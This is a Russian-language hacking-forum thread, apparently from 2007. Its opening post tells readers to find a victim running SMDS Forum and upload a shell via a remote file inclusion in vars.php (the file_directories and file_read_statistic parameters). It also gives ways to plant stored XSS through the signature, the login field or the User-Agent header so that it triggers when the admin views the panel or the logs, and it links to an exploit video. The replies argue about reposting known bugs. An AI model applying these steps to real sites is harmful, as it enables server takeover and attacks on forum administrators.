![]() |
заливка шелла в SMDS Forum
Нашёл статейку интересную про уязвимость в этом (SMDS), хоть и мало используемом, форуме. Дырка находится в файле vars.php и позволяет без труда загрузить шелл, если на сервере разрешён инклуд URL. Для начала - ищем нашу жертву. Нашли? Читаем дальше.
Проверяем на предмет разрешения доступа к файлу vars.php - заходим по ссылке адрес_форума/vars.php. Естественно, если доступ закрыт - будет ошибка 403. А если открыт - куча ошибок PHP. Среди них - одна ВАЖНАЯ: Warning: include() [function.include]: Failed opening '' for inclusion (include_path='.;C:\php5\pear') in C:\AppServ\www\forum\vars.php on line 110 Берём исходник скрипта и видим строку (кому лень искать исходник - говорю, что она там ЕСТЬ ): include "$file_directories"; При этом эта переменная нигде выше не задаётся в этом файле. Заходим по ссылке адрес_форума/vars.php?file_directories=URL_до_скрипта По заданной URL для удобства должен находиться файл РНР (сразу говорю - хостинг НЕ должен поддерживать РНР!) вида: PHP код: PHP код:
Только на этот раз - с переменной $file_read_statistic. Думаю, понятно. Если и к этому файлу закрыт доступ - можно просто наделать гадостей админу форума... Берём и регистрируемся на форуме, а в подписи пишем </textarea> <script language="JavaScript"> Наш скрипт... </script> И начинаем постить фигню на форуме, чтоб вынудить админа залезть в админку и удалить этого юзера. Как только он зайдёт туда - скрипт заработает. Или при авторизации написать скрипт в поле "Логин" - только кодировать его надо так, чтоб не было кавычек. Они там вырезаются. Этот скрипт сработает, если админ полезет смотреть логи удачных/неудачных авторизаций на форуме. Если нет - пишем скрипт строке User-Agent в Фаерфоксе и лазим им по форуму (изменить можно зайдя по адресу about:config). Тогда скрипт сработает при просмотре логов входа на главную. Вот такая вот фигня. (Написал, потому что многие этого не знают и пишут мне с вопросами типа "как сломать СМДС форум?". Понимаю, что им почти не пользуются, но мало ли...) (С)Eu_gen2007 |
видео к статье.. правда там чуть проще всё.. уже моё.
http://video.antichat.ru/files/smds_forum_remote_include.rar |
Цитата:
|
спасибо большое :)
|
Я тебе поражаюсь, ты себя гером возомнил?
Судя по этому: Код:
Нашёл статейку интереснуюДа и еще: Код:
ни 1 коммента.. ни 1 отзываСмотри вот инклуд файлов: https://forum.antichat.ru/showpost.p...55&postcount=1 Дата поста: 01.09.2007, 16:58 Заливка шелла (инклуд и пассивные xss там тоже есть) описывалась здесь: https://forum.antichat.ru/showpost.p...2&postcount=20 Дата поста: 14.06.2007, 16:59 И теперь Дата Твоего поста: 17.09.2007, 01:20 Так всё таки что ты такого сделал? Только честно ты думаешь можно взять уже найденную уязвимость, запостить её снова прикрутив к ней описание для даунов, и найти в добавок пару мелких багов Запостить всё это в отдельную тему и ещё написать "ну где же отзывы"? |
я не ждал восторгов, я ждал вопросов, либо др комментов!
+ я снял видео, что тебе ненравица я непонимаю, что ты понты кидаеш типа ты гуру хакинга? да мб ты и шариш, но не все же, гугу на ачате меньшенство, и хватит уже из себя строить непонятно кого =\ ==== ты мне ещё темы на ачате запрети создавать? ты мне никто! и не указывай мне что делать! мои действия вписываются в правила! |
Цитата:
|
в таком случае следовало бі прописать в правилах, что уязвимости выкладивать только с серверов microsoft.com,nasa.go.ua,php.net и тд...
|
Цитата:
Код:
4. Можно создавать отдельную тему о новой уязвимости, если ВЫ нашли эту УЯЗВИМОСТЬ. Но здесь вам не секлаб или милворм.Не надо копипастить сюда баги. Эти темы будут удалены и поставлен минус. |
|
| Время: 15:28 |